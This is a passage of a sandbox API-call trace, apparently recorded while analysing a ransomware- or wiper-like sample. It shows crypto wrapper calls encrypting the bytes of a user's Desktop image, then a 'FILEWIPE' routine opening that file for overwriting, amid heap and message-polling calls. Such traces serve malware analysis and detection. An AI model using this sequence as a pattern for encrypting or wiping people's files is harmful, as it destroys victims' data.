dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0161.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.825] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.825] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.825] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.825] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.825] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.825] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.825] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.825] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.826] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.826] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x15f5a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x15f60) returned 1 [0161.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.826] CharLowerBuffW (in: lpsz="byte[89953]", cchLength=0xb | out: lpsz="byte[89953]") returned 0xb [0161.828] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.828] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa06fb8*, pdwDataLen=0x87e820*=0x15f5a, dwBufLen=0x15f60 | out: pbData=0xa06fb8*, pdwDataLen=0x87e820*=0x15f60) returned 1 [0161.829] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.829] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.841] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0161.841] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.841] CryptDestroyKey (hKey=0x90aed8) returned 1 [0161.842] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.842] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.842] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.842] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.842] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.842] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0161.842] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.842] FreeLibrary (hLibModule=0x74f20000) returned 1 [0161.844] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0161.845] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f28b60, ftCreationTime.dwHighDateTime=0x1d5e03f, ftLastAccessTime.dwLowDateTime=0x2cab6d60, ftLastAccessTime.dwHighDateTime=0x1d5df44, ftLastWriteTime.dwLowDateTime=0x2cab6d60, ftLastWriteTime.dwHighDateTime=0x1d5df44, nFileSizeHigh=0x0, nFileSizeLow=0x15f5a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gyeJKtGlaF.bmp", cAlternateFileName="GYEJKT~1.BMP")) returned 0x90af58 [0161.845] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0161.845] CharLowerBuffW (in: lpsz="byte[89946]", cchLength=0xb | out: lpsz="byte[89946]") returned 0xb [0161.845] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0161.845] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0161.845] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0161.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0161.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2858 [0161.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2858, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0161.846] FreeLibrary (hLibModule=0x75c90000) returned 1 [0161.846] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0161.846] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0161.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0161.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0161.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.846] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0161.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0161.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd5a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0161.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gyejktglaf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0161.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0161.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0161.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0161.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5df70 | out: hHeap=0x8a0000) returned 1 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0161.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0161.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0161.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0161.849] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.850] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0161.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0161.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.851] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0161.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0161.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 